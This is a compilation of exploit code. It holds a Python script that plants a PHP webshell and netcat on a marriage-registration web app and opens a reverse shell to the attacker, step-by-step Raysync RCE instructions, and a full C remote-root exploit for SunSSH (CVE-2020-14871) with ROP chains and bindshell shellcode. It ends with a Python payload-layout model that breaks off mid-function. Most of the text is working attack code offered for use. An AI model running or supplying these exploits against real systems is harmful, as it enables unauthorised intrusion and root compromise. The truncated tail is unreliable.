reverse_port = 4444

# CONFIGURE HERE
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'


def login(url, mobile, password):
    url = "{}/user/login.php".format(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    cookie = req.cookies['PHPSESSID']
    return cookie


def upload(url, cookie, file=None):
    f = open(file, 'rb')
    filename, ext = os.path.splitext(file)
    if "exe" in ext:
        content_type = 'application/octet-stream'
    else:
        content_type = 'application/x-php'
    cookie = {'PHPSESSID':cookie}
    url = "{}/user/marriage-reg-form.php".format(url)
    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor',
               'haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test',
               'wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test',
               'witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test',
               'witnessnamet':'test','waddressthird':'test','submit':''}
    req = requests.post(url, data=payload, cookies=cookie, files=files)
    print(f'[+] File {ext} uploaded')


def get_remote_file(url, ext):
    url = "{}/user/images".format(url)
    req = requests.get(url)
    junk = req.text.split(ext)[0]
    f = junk[-42:] + ext
    return f


def persistence(url, webshell, netcat):
    # webshell
    payload_w = "copy /y {} shell.php".format(webshell)
    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
    req_w = requests.get(url_w)
    # netcat
    payload_n = "copy /y {} nc.exe".format(netcat)
    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
    req_n = requests.get(url_n)
    print('[+] Persistence enabled')


def get_reverse(url, ip, port):
    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
    print('[+] Reverse shell incoming!')
    req = requests.get(url_r)


# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port):
    # Launch the app
    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")

    async def main(connection):
        app = await iterm2.async_get_app(connection)
        window = app.current_window
        if window is not None:
            cmd = "nc -lnv {}".format(port)
            await window.async_create_tab(command=cmd)
        else:
            print("No current window")

    iterm2.run_until_complete(main)


if __name__ == "__main__":
    # original read len(sys.argv < 3), which is a TypeError; three arguments plus the script name are required
    if len(sys.argv) < 4:
        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
    else:
        cookie = login(url, mobile, password)
        upload(url, cookie, netcat_path)
        upload(url, cookie, shell_path)
        webshell = get_remote_file(url, '.php')
        netcat = get_remote_file(url, '.exe')
        persistence(url, webshell, netcat)
        start_listener(reverse_port)
        get_reverse(url, reverse_ip, reverse_port)
-
Raysync 3.3.3.8 - RCE
# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

Step 1: Run RaysyncServer.sh to build a web application in the local environment and set the admin password to 123456, which will be written to the manage.db file.

Step 2: Run

curl "[email protected]" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db

to overwrite the remote manage.db file on the server.

Step 3: Log in to the admin portal with admin/123456.

Step 4: Create a normal file with all permissions in scope.

Step 5: Modify RaySyncServer.sh and add an arbitrary evil command.

Step 6: Trigger the RCE by clicking the "reset" button.
-
Solaris SunSSH 11.0 x86 - libpam Remote Root
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root
# Exploit Author: Hacker Fantastic
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html
# Version: 11
# Tested on: SunOS solaris 5.11 11.0

/* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
 * ====================================================================
 * Makefile
 * all: hfsunsshdx
 *
 * hfsunsshdx: main.c
 *     gcc main.c -o hfsunsshdx -lssh2
 *
 * clean:
 *     rm -rf hfsunsshdx
 *     rm -rf core.*
 *
 * A trivial to reach stack-based buffer overflow is present in libpam on
 * Solaris. The vulnerable code exists in pam_framework.c parse_user_name()
 * which allocates a fixed size buffer of 512 bytes on the stack and parses
 * usernames into the buffer via modules (authtok_get) without bounds checks.
 * This issue can be reached remotely pre-authentication via SunSSH when
 * "keyboard-interactive" is enabled to use PAM based authentication. The
 * vulnerability was discovered being actively exploited by FireEye in the
 * wild and is part of an APT toolkit called "EVILSUN". The vulnerability
 * is present in both SPARC/x86 versions of Solaris & others (eg. illumos).
 * This exploit uses ROP gadgets to disable nxstack through mprotect on x86
 * and a helper shellcode stub. The configuration in a default Solaris
 * install is vulnerable. The exploit makes use of libssh2 and tested on
 * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable
 * SunSSH implementation and versions later than 11.1 have updated SunSSH
 * code that prevents the issue being triggered.
 *
 * e.g.
 * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2
 * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871
 * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86'
 * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes
 * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e
 * [+] entering keyboard-interactive authentication.
 * [-] number of prompts: 1
 * [-] prompt 0 from server: 'Please enter user name: '
 * [-] shellcode length 193 bytes
 * [-] rop chain length 68
 * [-] exploit buffer length 580
 * [-] sending exploit magic buffer... wait
 * [+] exploit success, handling payload...
 * [-] connected.. enjoy :)
 * SunOS solaris 5.11 11.0 i86pc i386 i86pc
 * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01
 * helpdesk console Nov 27 17:57
 * uid=0(root) gid=0(root)
 *
 * -- Hacker Fantastic (https://hacker.house)
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <ctype.h>
#include <getopt.h>
#include <time.h>
#include <signal.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <libssh2.h>

int sd = -1;
int oldsd = -1;
int ishell = -1;
char* buf;
char* payload;
char* retaddr;
struct sockaddr_in sain;

struct target {
    char* name;
    char* ropchain;
};

struct shellcode {
    char* name;
    char* shellcode;
};

void spawn_shell(int);
void bindshell_setup(short);
void on_alarm(int);
void on_interupt(int);
void prepare_payload();

const int targetno = 5;
struct target targets[] = {
    {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86",
     "\x41\x42\x43\x44" // %ebx
     "\x45\x46\x47\x48" // %esi
     "\x50\x51\x52\x53" // %ebp
     "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp
     "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7)
     "\x01\x01\x04\x08" // %edx unused, must be writeable addr
     "\x41\x42\x43\x44" // %ebp unused var
     "\x93\xdb\xc8\xfe" // pop %edx ; ret
     "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg
     "\x1a\xe7\x0b\xfe" // dec %edx ; ret
     "\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret
     "\x93\xdb\xc8\xfe" // pop %edx ; ret
     "\x01\x30\x04\x08" // ptr to shellcode
     "\xe0\xe8\x3e\xfe" // mov $0x72,%al
     "\x64\x7c\xc3\xfe" // inc %eax ; ret
     "\x64\x7c\xc3\xfe" // inc %eax ; ret
     "\x22\x9d\xd3\xfe"},// sysenter
    {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86",
     "\x41\x42\x43\x44" // %ebx overwrite unused
     "\x41\x42\x43\x44" // %esi overwrite unused
     "\xf8\x32\x04\x08" // %ebp overwrite unused
     "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret
     "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7)
     "\x01\x30\x04\x08" // ptr for %edx
     "\x44\x43\x42\x41" // ptr for %ebp unused
     "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret
     "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret
     "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret
     "\xeb\x30\x04\x08" // shellcode ptr for %edx
     "\x1c\x33\x04\x08" // %ebp & used by "leave"
     "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret
     "\x41\x42\x43\x44" // %esi unused
     "\xe0\x30\x04\x08" // shellcode ptr to %ebx
     "\xe8\x32\x04\x08" // ptr into %ebp
     "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
     "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
     "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret
     "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret
     "\xfe\xf8\xcf\xfe"},// sysenter
    {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86",
     "\xc3\x31\x04\x08" // overwrite %ebp unused
     "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
     "\x29\x28\x07\x08" // pop %ebx ; ret
     "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget
     "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
     "\x01\x30\x04\x08" // %edx pointer to page
     "\xb8\x31\x04\x08" // unused %ebp value
     "\xaa\x4c\x68\xfe" // pop %ecx ; ret
     "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7)
     "\x61\x22\x07\x08" // dec %edx ; ret
     "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret
     "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret
     "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret
     "\xc3\x31\x04\x08" // shellcode addr for %edx
     "\xc3\x31\x04\x08" // unused %ebp value
     "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx)
    {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86",
     "\xc3\x31\x04\x08" // overwrite %ebp unused
     "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
     "\xb1\x26\x07\x08" // pop %ebx ; ret
     "\xff\x01\xac\xfe" // write garbage here, unused gadget
     "\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret
     "\xff\x2f\x04\x08" // %edx pointer to page
     "\xc3\x31\x04\x08" // unused %ebp value
     "\x57\xaa\xe4\xfe" // pop %ecx ; ret
     "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7)
     "\xee\x6a\x65\xfe" // inc %edx ; ret
     "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
     "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret
     "\x86\xae\xe5\xfe" // pop %edx ; ret
     "\xc3\x31\x04\x08" // shellcode return address for %edx
     "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
    {"Solaris all Sun_SSH_1.x.x debug crash target",
     "\x41\x42\x43\x43" // %ebp ptr
     "\x78\x79\x80\x81"} // %eip ptr
};

const int shellno = 4;
struct shellcode shellcodes[] = {
    {"Solaris x86 bindshell tcp port 9999",
     /* mprotect magic stub necessary for payloads expecting +x stack */
     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
     "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
     "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
     /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
        ==================================================================
        xorl %eax, %eax
        xorl %ecx, %ecx
        movl $0x08041001, %ebx
        movw $0x7001, %ax
        movb $0x7,%cl
        dec %ebx
        dec %eax
        pushl %ecx
        pushl %eax
        pushl %ebx
        pushl %ebx
        movl %esp, %ecx
        xorl %eax, %eax
        movb $0x74, %al
        int $0x91
     */
     /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
     "\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
     "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
     "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
     "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
     "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
     "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
     "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
     "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x2a\x95"}, {"Solaris x86 bindshell tcp port 8080", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x44\x60"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 9999", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" 
"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" "\x9f\x56\x1b\x2c\xdf\x8f"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 4444", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" "\x0a\x39\x6b\xeb\x53\x6b"} }; void spawn_shell(int sd) { #define sockbuflen 2048 int rcv; char sockbuf[sockbuflen]; fd_set readfds; memset(sockbuf,0,sockbuflen); snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); write(sd,sockbuf,strlen(sockbuf)); while (1) { FD_ZERO(&readfds); FD_SET(0,&readfds); FD_SET(sd,&readfds); select(255,&readfds,NULL,NULL,NULL); if (FD_ISSET(sd, &readfds)) { memset(sockbuf,0,sockbuflen); rcv = read(sd,sockbuf,sockbuflen); if (rcv <= 0) { printf("\e[1m\e[34m[!] 
connection closed by foreign host.\n\e[0m"); exit(-1); } printf("%s",sockbuf); fflush(stdout); } if(FD_ISSET(0,&readfds)) { memset(sockbuf,0,sockbuflen); read(0,sockbuf,sockbuflen); write(sd,sockbuf,strlen(sockbuf)); } } } void bindshell_setup(short port){ oldsd = sd; sd = socket(AF_INET,SOCK_STREAM,0); sain.sin_port = htons(port); if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ printf("[!] fatal bind shell failed\n\e[0m"); exit(-1); } printf("[-] connected.. enjoy :)\e[0m\n"); spawn_shell(sd); } void on_alarm(int signum){ printf("[+] exploit success, handling payload...\n"); if(ishell==0||ishell==2){ bindshell_setup(9999); } if(ishell==1||ishell==3){ bindshell_setup(8080); } printf("[-] exploit complete\n\e[0m"); exit(0); } void on_interrupt(int signum){ printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); if(sd){ close(sd); } if(oldsd){ close(oldsd); } exit(0); } void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ #define payload_size 4096 int len = strlen(payload); buf = malloc(payload_size); char randchar = 'A'; char* randbuf = malloc(2); if(!buf||!randbuf){ printf("[!] fatal payload buffer error\n"); exit(-1); } srand(time(NULL)); memset(buf,'\x00',payload_size); memset(randbuf,0,2); printf("[-] shellcode length %d bytes\n",len); if(len < 512 && payload_size > 1024){ memcpy(buf,payload,len); for(int i =0;i <= (512 - len);i++){ randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; memcpy(randbuf,&randchar,1); strcat(buf,randbuf); } len = strlen(retaddr); printf("[-] rop chain length %d\n",len); if(len + 512 < payload_size){ memcpy((void*)(long)buf+512,(void*)retaddr,len); len = strlen(buf); printf("[-] exploit buffer length %d\n",len); } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } else{ printf("[!] 
exploit buffer miscalculated\n"); exit(-1); } } static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { int i = 0; signal(SIGALRM, &on_alarm); printf("[+] entering keyboard-interactive authentication.\n"); printf("[-] number of prompts: %d\n", num_prompts); printf("[-] prompt %d from server: '", i); fwrite(prompts[i].text, 1, prompts[i].length, stdout); printf("'\n"); prepare_payload(); //uncomment to pause for gdb debugging //sleep(10); responses[i].text = strdup(buf); responses[i].length = strlen(buf); printf("[-] sending exploit magic buffer... wait\n"); alarm(5); } int main(int argc,char **argv){ int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; char* host; int i, type, exitcode; unsigned long hostaddr; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; char *exitsignal = (char *)"none"; size_t len; LIBSSH2_KNOWNHOSTS *nh; static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 'x'}, {"help", 0, 0,'h'} }; printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); while(rc != -1) { rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); switch(rc) { case -1: break; case 's': if(ihost==0){ host = malloc(strlen(optarg) + 1); if(host){ sprintf(host,"%s",optarg); ihost = 1; } } break; case 'p': port = atoi(optarg); break; case 'x': if(ishell==-1) { rc = atoi(optarg); switch(rc){ case 0: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 1: printf("[-] using shellcode '%s' %d 
bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 2: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 3: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; default: printf("[!] Invalid shellcode selection %d\n",rc); exit(0); break; } } break; case 't': if(itarg==0){ rc = atoi(optarg); switch(rc){ case 0: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 1: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 2: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 3: printf("[-] chosen target 
'%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 4: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; default: printf("[!] Invalid target selection %d\n", rc); exit(0); break; } itarg = 1; } break; case 'h': printf("[!] Usage instructions.\n[\n"); printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]); printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n"); printf("[ --shellcode|-x <shellcode#>\n[\n"); printf("[ Target#'s\n"); for(i = 0;i <= targetno - 1;i++){ printf("[ %d \"%s\"\n",i,targets[i]); } printf("[\n[ Shellcode#'s\n"); for(i = 0;i <= shellno - 1;i++){ printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); } printf("\e[0m"); exit(0); break; default: break; } } if(itarg != 1 || ihost != 1 || ishell < 0){ printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); exit(-1); } rc = libssh2_init(0); hostaddr = inet_addr(host); sd = socket(AF_INET, SOCK_STREAM, 0); sain.sin_family = AF_INET; sain.sin_port = htons(port); sain.sin_addr.s_addr = hostaddr; if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "[!] failed to connect!\n"); goto shutdown; } session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); if(rc) { printf("[!] failure establishing ssh session: %d\n", rc); goto shutdown; } nh = libssh2_knownhost_init(session); if(!nh) { printf("[!] 
failure on libssh2 init\n"); goto shutdown; } fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); printf("[+] ssh host fingerprint: "); for(i = 0; i < 20; i++) { printf("%02x", (unsigned char)fingerprint[i]); } printf("\n"); libssh2_knownhost_free(nh); signal(SIGINT,&on_interrupt); libssh2_userauth_keyboard_interactive(session, "", &kbd_callback); printf("[!] exploit failed, core maybe on target!\n"); shutdown: if(sd){ close(sd); } printf("\e[0m"); return -2; }
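The layout that prepare_payload() builds is the part a practitioner has to get right when porting this to another target: the reply must fill the 512-byte parse_user_name() buffer exactly, the ROP chain must start at offset 512, and none of it may contain 0x00, 0x09 or 0x20. The following is an added Python model of that layout, not part of the original exploit; the shellcode and chain bytes in it are constructed stand-ins, not the page's gadget addresses.

```python
import os
import string
from typing import Callable, List, Tuple

# Constraints stated in the exploit above: parse_user_name() copies the reply
# into a 512-byte stack buffer, and prepare_payload() notes that 0x00 (C string
# terminator), 0x09 and 0x20 (PAM prompt whitespace) must not appear in it.
BUFFER_SIZE = 512
BAD_BYTES = frozenset({0x00, 0x09, 0x20})
FILLER_ALPHABET = string.ascii_letters.encode()  # same filler set the exploit uses

# Constructed stand-ins so the example runs offline; not the page's shellcode
# or ROP gadget addresses.
SAMPLE_SHELLCODE = b"\x90" * 26 + b"\x31\xc0\x31\xc9\xcc"                      # 31 bytes
SAMPLE_ROPCHAIN = b"AAAA" + b"BBBB" + b"CCCC" + b"\xa7\x0e\x06\x08" + b"DDDD"  # 20 bytes


def find_bad_bytes(blob: bytes) -> List[Tuple[int, int]]:
    """Return (offset, value) for every byte the PAM prompt path would mangle."""
    return [(i, b) for i, b in enumerate(blob) if b in BAD_BYTES]


def build_exploit_buffer(shellcode: bytes, ropchain: bytes,
                         rng: Callable[[int], bytes] = os.urandom) -> bytes:
    """Lay out the keyboard-interactive reply the way prepare_payload() does:
    shellcode at offset 0, alphabetic filler up to the 512-byte buffer, then the
    ROP chain that lands on the saved registers and the return address."""
    if len(shellcode) >= BUFFER_SIZE:
        raise ValueError("shellcode must fit inside the 512-byte buffer with room for filler")
    if len(ropchain) == 0 or len(ropchain) % 4:
        raise ValueError("ROP chain must be a whole number of 32-bit words")
    for name, blob in (("shellcode", shellcode), ("ropchain", ropchain)):
        bad = find_bad_bytes(blob)
        if bad:
            raise ValueError(f"{name} contains forbidden bytes at {bad}")
    # Random letters only: never a bad byte, and they survive strcat() in C.
    filler = bytes(FILLER_ALPHABET[b % len(FILLER_ALPHABET)]
                   for b in rng(BUFFER_SIZE - len(shellcode)))
    return shellcode + filler + ropchain


def is_deliverable(shellcode: bytes, ropchain: bytes) -> bool:
    """True when the pair passes every constraint build_exploit_buffer enforces."""
    try:
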